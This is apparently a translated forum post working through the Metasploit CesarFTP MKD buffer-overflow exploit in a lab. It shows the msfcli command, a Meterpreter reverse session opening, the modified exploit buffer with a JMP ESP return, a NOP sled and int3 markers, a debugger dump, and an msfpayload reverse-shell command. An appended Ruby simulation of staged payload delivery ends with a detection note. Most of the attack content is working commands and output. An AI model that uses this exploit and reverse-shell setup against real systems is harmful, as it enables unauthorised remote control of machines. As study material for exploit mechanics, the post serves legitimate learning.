Let me tell you what I have just been looking into...
Since there is no way to get the script working, I modified the Metasploit Ruby module a bit, changing the following values
root@bt:~/Desktop/cesar# msfcli exploit/windows/ftp/cesarftp_mkd RHOST=192.168.11.15 FTPPASS=ftp FTPUSER=ftp E
[*] Please wait while we load the module tree...
RHOST => 192.168.11.15
FTPPASS => ftp
FTPUSER => ftp
[*] Started reverse handler on 192.168.10.195:4444
[*] Trying target Windows RockHounD...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (752128 bytes) to 192.168.11.15
[*] Meterpreter session 1 opened (192.168.10.195:4444 -> 192.168.11.15:1115) at 2012-03-02 23:48:17 +0100
meterpreter > exit
[*] Shutting down Meterpreter...
[*] Meterpreter session 1 closed. Reason: User exit
sploit = "\n" * 671 + rand_text_english(3, payload_badchars)  # 671 newlines, then 3 random filler bytes
sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded + "\r\n"  # return address (little-endian), 40-byte NOP sled, encoded payload
for these instead:
sploit = "\n" * 671 + "AAA"  # fixed filler that is easy to spot in the debugger
sploit << [target.ret].pack('V') + "\x90" * 40 + "\xcc\xcc\xcc\xcc" + payload.encoded + "\xcc\xcc\xcc\xcc" + "\r\n"  # plain 0x90 NOPs, int3 (0xcc) markers on both sides of the payload
and I got the following result.
00B0EE40 350A0D2D -..5 # buffer "\n" * 671
00B0EE44 0D2D3035 50-. # buffer "\n" * 671
00B0EE48 3035350A .550 # buffer "\n" * 671
00B0EE4C 41414120 AAA # "AAA"
00B0EE50 77D5AA01 ªÕw USER32.77D5AA01 # jump to JMP ESP
00B0EE54 90909090 # NOPs
00B0EE58 90909090 # NOPs
00B0EE5C 90909090 # NOPs
00B0EE60 90909090 # NOPs
00B0EE64 90909090 # NOPs
00B0EE68 90909090 # NOPs
00B0EE6C 90909090 # NOPs
00B0EE70 90909090 # NOPs
00B0EE74 90909090 # NOPs
00B0EE78 90909090 # NOPs
00B0EE7C D42AFD03 ý*Ô # Shellcode
00B0EE80 E011737F sà # Shellcode
00B0EE84 7F4B782F /xK # Shellcode
00B0EE88 D50B7A14 zÕ # Shellcode
00B0EE8C 7D157BB7 ·{} SHELL32.7D157BB7 # Shellcode # Isn't this calling somewhere?
00B0EE90 72B4B043 C°´r # Shellcode
00B0EE94 7C679246 F’g| # Shellcode
00B0EE98 4E76F510 õvN # Shellcode
00B0EE9C 32751D77 wu2 # Shellcode
00B0EEA0 9F4FEBF7 ÷ëOŸ # Shellcode
00B0EEA4 7443E3B4 ´ãCt # Shellcode
00B0EEA8 C0A92C2F /,©À # Shellcode
00B0EEAC E13070F8 øp0á # Shellcode
..... etc.
Then, by my own interpretation, I think that:
[*] Started reverse handler on 192.168.10.195:4444 # sets up the listener on local port 4444
[*] Trying target Windows RockHounD...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes) # sends the shellcode
[*] Sending stage (752128 bytes) to 192.168.11.15 # sends the Meterpreter payload, but having already connected to the handler
What I don't understand... well, basically, if I run the following command in BT:
root@bt:~/Desktop/cesar# msfpayload windows/shell/reverse_ord_tcp LHOST="192.168.10.195" EXITFUNC=process P
It returns two pieces of code.
# windows/shell/reverse_ord_tcp - 93 bytes (stage 1)
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.10.195, LPORT=4444,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
# windows/shell/reverse_ord_tcp - 240 bytes (stage 2)
# http://www.metasploit.com
That's as far as I can get... if you want me to do anything, I'll gladly do it, Ivanchuk.
Regards.
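As an added example (not from the post above and not Metasploit's own code), the two-stage flow behind the handler output and the two msfpayload pieces, modelled with plain Ruby sockets: a small connect-back "stage 1" and a handler that only pushes "stage 2" once that connection exists. The 4-byte little-endian length prefix is an assumption modelled on the usual reverse_tcp stager convention, and the stage bytes are a constructed stand-in, not a payload.

```ruby
require 'socket'

# Constructed stand-in for the 752128-byte Meterpreter stage in the post:
# repeated ASCII only, no real payload bytes.
SAMPLE_STAGE = ('STAGE2-' * 200).b # 1400 bytes, more than one TCP segment

# Handler side ("Started reverse handler"): once a connect-back arrives,
# push the stage with a 4-byte little-endian length in front of it.
# The length prefix is an assumption, not something taken from the post.
def push_stage(io, stage)
  io.write([stage.bytesize].pack('V') + stage)
end

# Stager side (the job of the small "stage 1"): read the length, then keep
# reading until the whole stage has arrived. A single recv is not enough for
# a large stage, which is why a stager must loop (or, as in the post, why an
# intermediate stager is sent first for an over-sized stage).
def read_stage(io)
  header = io.read(4)
  raise 'connection closed before the length prefix' unless header && header.bytesize == 4
  len = header.unpack('V').first
  stage = ''.b
  stage << io.readpartial(len - stage.bytesize) while stage.bytesize < len
  stage
end

# Runs both ends over loopback on an OS-chosen port and reports whether the
# stage read by the "stager" equals the one the "handler" sent.
def simulate_staged_delivery(stage = SAMPLE_STAGE)
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  handler = Thread.new do
    client = server.accept    # the session exists only after stage 1 connected
    push_stage(client, stage) # this is where "Sending stage (N bytes)" happens
    client.close
  end
  stager = TCPSocket.new('127.0.0.1', port)
  received = read_stage(stager)
  stager.close
  handler.join
  server.close
  { sent: stage.bytesize, received: received.bytesize, match: received == stage }
end

puts simulate_staged_delivery.inspect if __FILE__ == $PROGRAM_NAME
```

Seen from the network, the tell-tale of this flow is the listener pushing a large binary blob immediately after the TCP handshake, before the connecting host has sent any request, which is a useful detection signal for staged reverse connections.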